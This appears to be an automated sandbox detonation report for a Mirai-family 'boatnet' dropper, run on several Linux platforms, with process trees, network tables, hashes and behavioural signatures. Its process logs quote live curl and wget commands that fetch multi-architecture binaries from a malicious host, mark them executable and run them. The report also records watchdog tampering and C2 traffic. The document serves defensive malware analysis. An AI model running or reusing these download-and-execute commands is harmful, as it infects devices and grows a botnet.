[chmod +x WTF boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 gdm3-config-err-NZTdfe ohshit.sh snap-private-tmp systemd-private-3420cd04214342b9b682e7d367fd30db-ModemManager.service-oEszXy systemd-private-3420cd04214342b9b682e7d367fd30db-colord.service-KqUpMn systemd-private-3420cd04214342b9b682e7d367fd30db-power-profiles-daemon.service-N1Zaai systemd-private-3420cd04214342b9b682e7d367fd30db-switcheroo-control.service-1vBy2v systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-logind.service-bkKqLi systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-oomd.service-UisfHH systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-resolved.service-ns0GkU systemd-private-3420cd04214342b9b682e7d367fd30db-systemd-timedated.service-rAH48K systemd-private-3420cd04214342b9b682e7d367fd30db-upower.service-dQRF3t]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://94.156.71.225/hiddenbin/boatnet.x86_64]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | N/A | udp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | N/A | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | N/A | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | N/A | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | N/A | tcp |
| NL | 94.156.71.225:3778 | N/A | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | N/A | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | N/A | tcp |
| NL | 94.156.71.225:3778 | N/A | tcp |
| NL | 94.156.71.225:3778 | N/A | tcp |
Files
/tmp/boatnet.x86
| MD5 | ba2cb5b8715ba94c39e24e75a34d0ea0 |
| SHA1 | 7182bf3b0e14e5224e741c15174c6e93f00df444 |
| SHA256 | 01fad47db364d66c0a9ed9c6c5c558c5a95eb0d015bec4be5f1109d14e15ec33 |
| SHA512 | 0c26a32066b88dc22aada2ca606639e6717b84501402eac80107f7130fca6c43f6cd40e11e88ae1deda45320a6c726af04bf946818ef3099d84f31e523f9b33d |
memory/1585-1-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1594-2-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1604-3-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1613-4-0x0000000008048000-0x000000000805ce08-memory.dmp
memory/1622-5-0x0000000008048000-0x000000000805ce08-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-31 21:05
Reported
2024-08-31 21:06
Platform
debian12-armhf-20240418-en
Max time kernel
60s
Max time network
63s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.i468 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WTF | /tmp/ohshit.sh | N/A |
Processes
/tmp/ohshit.sh
[/tmp/ohshit.sh]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.x86]
/usr/bin/cat
[cat boatnet.x86]
/usr/bin/chmod
[chmod +x boatnet.x86 ohshit.sh systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-ntpsec.service-SFsGOS systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-systemd-logind.service-ihFcfN systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-systemd-timedated.service-qtJorK WTF]
/tmp/WTF
[./WTF]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.mips]
/usr/bin/cat
[cat boatnet.mips]
/usr/bin/chmod
[chmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-ntpsec.service-SFsGOS systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-systemd-logind.service-ihFcfN WTF]
/tmp/WTF
[./WTF]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.arc]
/usr/bin/cat
[cat boatnet.arc]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-ntpsec.service-SFsGOS systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-systemd-logind.service-ihFcfN WTF]
/tmp/WTF
[./WTF]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.i468]
/usr/bin/cat
[cat boatnet.i468]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-ntpsec.service-SFsGOS systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-systemd-logind.service-ihFcfN WTF]
/tmp/WTF
[./WTF]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.i686]
/usr/bin/cat
[cat boatnet.i686]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-ntpsec.service-SFsGOS systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-systemd-logind.service-ihFcfN WTF]
/tmp/WTF
[./WTF]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.x86_64]
/usr/bin/cat
[cat boatnet.x86_64]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-ntpsec.service-SFsGOS systemd-private-dd929f7d4fa24f4987f819e45ccd21d1-systemd-logind.service-ihFcfN WTF]
/tmp/WTF
[./WTF]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.mpsl]
Network
| Country | Destination | Domain | Proto |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| US | 1.1.1.1:53 | debian12-armhf-20240418-en-3 | udp |
| US | 1.1.1.1:53 | debian12-armhf-20240418-en-3 | udp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| US | 1.1.1.1:53 | debian12-armhf-20240418-en-3 | udp |
| US | 1.1.1.1:53 | debian12-armhf-20240418-en-3 | udp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
Files
/tmp/boatnet.x86
| MD5 | ba2cb5b8715ba94c39e24e75a34d0ea0 |
| SHA1 | 7182bf3b0e14e5224e741c15174c6e93f00df444 |
| SHA256 | 01fad47db364d66c0a9ed9c6c5c558c5a95eb0d015bec4be5f1109d14e15ec33 |
| SHA512 | 0c26a32066b88dc22aada2ca606639e6717b84501402eac80107f7130fca6c43f6cd40e11e88ae1deda45320a6c726af04bf946818ef3099d84f31e523f9b33d |
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-31 21:05
Reported
2024-08-31 21:06
Platform
debian12-mipsel-20240729-en
Max time kernel
61s
Max time network
67s
Command Line
Signatures
Mirai
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates running processes
Writes file to system bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/30/status | /tmp/WTF | N/A |
| File opened for reading | /proc/16/status | /tmp/WTF | N/A |
| File opened for reading | /proc/847/status | /tmp/WTF | N/A |
| File opened for reading | /proc/698/status | /tmp/WTF | N/A |
| File opened for reading | /proc/6/status | /tmp/WTF | N/A |
| File opened for reading | /proc/698/status | /tmp/WTF | N/A |
| File opened for reading | /proc/405/status | /tmp/WTF | N/A |
| File opened for reading | /proc/858/status | /tmp/WTF | N/A |
| File opened for reading | /proc/829/status | /tmp/WTF | N/A |
| File opened for reading | /proc/2/status | /tmp/WTF | N/A |
| File opened for reading | /proc/11/status | /tmp/WTF | N/A |
| File opened for reading | /proc/28/status | /tmp/WTF | N/A |
| File opened for reading | /proc/23/status | /tmp/WTF | N/A |
| File opened for reading | /proc/31/status | /tmp/WTF | N/A |
| File opened for reading | /proc/15/status | /tmp/WTF | N/A |
| File opened for reading | /proc/866/status | /tmp/WTF | N/A |
| File opened for reading | /proc/11/status | /tmp/WTF | N/A |
| File opened for reading | /proc/695/status | /tmp/WTF | N/A |
| File opened for reading | /proc/868/status | /tmp/WTF | N/A |
| File opened for reading | /proc/869/status | /tmp/WTF | N/A |
| File opened for reading | /proc/33/status | /tmp/WTF | N/A |
| File opened for reading | /proc/675/status | /tmp/WTF | N/A |
| File opened for reading | /proc/118/status | /tmp/WTF | N/A |
| File opened for reading | /proc/111/status | /tmp/WTF | N/A |
| File opened for reading | /proc/751/status | /tmp/WTF | N/A |
| File opened for reading | /proc/843/status | /tmp/WTF | N/A |
| File opened for reading | /proc/392/status | /tmp/WTF | N/A |
| File opened for reading | /proc/27/status | /tmp/WTF | N/A |
| File opened for reading | /proc/112/status | /tmp/WTF | N/A |
| File opened for reading | /proc/663/status | /tmp/WTF | N/A |
| File opened for reading | /proc/53/status | /tmp/WTF | N/A |
| File opened for reading | /proc/5/status | /tmp/WTF | N/A |
| File opened for reading | /proc/885/status | /tmp/WTF | N/A |
| File opened for reading | /proc/24/status | /tmp/WTF | N/A |
| File opened for reading | /proc/843/status | /tmp/WTF | N/A |
| File opened for reading | /proc/10/status | /tmp/WTF | N/A |
| File opened for reading | /proc/837/status | /tmp/WTF | N/A |
| File opened for reading | /proc/34/status | /tmp/WTF | N/A |
| File opened for reading | /proc/35/status | /tmp/WTF | N/A |
| File opened for reading | /proc/1/status | /tmp/WTF | N/A |
| File opened for reading | /proc/827/status | /tmp/WTF | N/A |
| File opened for reading | /proc/25/status | /tmp/WTF | N/A |
| File opened for reading | /proc/862/status | /tmp/WTF | N/A |
| File opened for reading | /proc/875/status | /tmp/WTF | N/A |
| File opened for reading | /proc/392/status | /tmp/WTF | N/A |
| File opened for reading | /proc/840/status | /tmp/WTF | N/A |
| File opened for reading | /proc/674/status | /tmp/WTF | N/A |
| File opened for reading | /proc/53/status | /tmp/WTF | N/A |
| File opened for reading | /proc/698/status | /tmp/WTF | N/A |
| File opened for reading | /proc/17/status | /tmp/WTF | N/A |
| File opened for reading | /proc/35/status | /tmp/WTF | N/A |
| File opened for reading | /proc/113/status | /tmp/WTF | N/A |
| File opened for reading | /proc/59/status | /tmp/WTF | N/A |
| File opened for reading | /proc/675/status | /tmp/WTF | N/A |
| File opened for reading | /proc/675/status | /tmp/WTF | N/A |
| File opened for reading | /proc/24/status | /tmp/WTF | N/A |
| File opened for reading | /proc/30/status | /tmp/WTF | N/A |
| File opened for reading | /proc/833/status | /tmp/WTF | N/A |
| File opened for reading | /proc/7/status | /tmp/WTF | N/A |
| File opened for reading | /proc/16/status | /tmp/WTF | N/A |
| File opened for reading | /proc/9/status | /tmp/WTF | N/A |
| File opened for reading | /proc/840/status | /tmp/WTF | N/A |
| File opened for reading | /proc/837/status | /tmp/WTF | N/A |
| File opened for reading | /proc/870/status | /tmp/WTF | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.i468 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WTF | /tmp/ohshit.sh | N/A |
| File opened for modification | /tmp/boatnet.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.spc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm7 | /usr/bin/curl | N/A |
Processes
/tmp/ohshit.sh
[/tmp/ohshit.sh]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.x86]
/usr/bin/cat
[cat boatnet.x86]
/usr/bin/chmod
[chmod +x boatnet.x86 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-timedated.service-9uBzHH WTF]
/tmp/WTF
[./WTF]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.mips]
/usr/bin/cat
[cat boatnet.mips]
/usr/bin/chmod
[chmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF]
/tmp/WTF
[./WTF]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.arc]
/usr/bin/cat
[cat boatnet.arc]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF]
/tmp/WTF
[./WTF]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.i468]
/usr/bin/cat
[cat boatnet.i468]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF]
/tmp/WTF
[./WTF]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.i686]
/usr/bin/cat
[cat boatnet.i686]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF]
/tmp/WTF
[./WTF]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.x86_64]
/usr/bin/cat
[cat boatnet.x86_64]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF]
/tmp/WTF
[./WTF]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.mpsl]
/usr/bin/cat
[cat boatnet.mpsl]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF]
/tmp/WTF
[./WTF]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.arm]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF]
/tmp/WTF
[./WTF]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.arm5]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF]
/tmp/WTF
[./WTF]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.arm6]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF]
/tmp/WTF
[./WTF]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.arm7]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF]
/tmp/WTF
[./WTF]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.ppc]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF]
/tmp/WTF
[./WTF]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.spc]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF]
/tmp/WTF
[./WTF]
/usr/bin/curl
[curl -O http://94.156.71.225/hiddenbin/boatnet.m68k]
/usr/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-4540edd8dfdd401f85028cae0e75b288-systemd-logind.service-VaExBE WTF]
/tmp/WTF
[./WTF]
Network
| Country | Destination | Domain | Proto |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| US | 1.1.1.1:53 | debian12-mipsel-20240729-en-7 | udp |
| US | 1.1.1.1:53 | debian12-mipsel-20240729-en-7 | udp |
| US | 1.1.1.1:53 | debian12-mipsel-20240729-en-7 | udp |
| US | 1.1.1.1:53 | debian12-mipsel-20240729-en-7 | udp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
| NL | 94.156.71.225:3778 | | tcp |
| NL | 94.156.71.225:80 | 94.156.71.225 | tcp |
Files
/tmp/boatnet.x86
| MD5 | ba2cb5b8715ba94c39e24e75a34d0ea0 |
| SHA1 | 7182bf3b0e14e5224e741c15174c6e93f00df444 |
| SHA256 | 01fad47db364d66c0a9ed9c6c5c558c5a95eb0d015bec4be5f1109d14e15ec33 |
| SHA512 | 0c26a32066b88dc22aada2ca606639e6717b84501402eac80107f7130fca6c43f6cd40e11e88ae1deda45320a6c726af04bf946818ef3099d84f31e523f9b33d |
memory/826-1-0x00400000-0x0043bfb4-memory.dmp
memory/836-2-0x00400000-0x0043bfb4-memory.dmp
memory/846-3-0x00400000-0x0043bfb4-memory.dmp
memory/855-4-0x00400000-0x0043bfb4-memory.dmp
memory/865-5-0x00400000-0x0043bfb4-memory.dmp
memory/874-6-0x00400000-0x0043bfb4-memory.dmp
memory/884-7-0x00400000-0x0043bfb4-memory.dmp
memory/895-8-0x00400000-0x0043bfb4-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-08-31 21:05
Reported
2024-08-31 21:06
Platform
ubuntu2404-amd64-20240523-en
Max time kernel
60s
Max time network
64s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
Loads a kernel module
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | /tmp/WTF | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
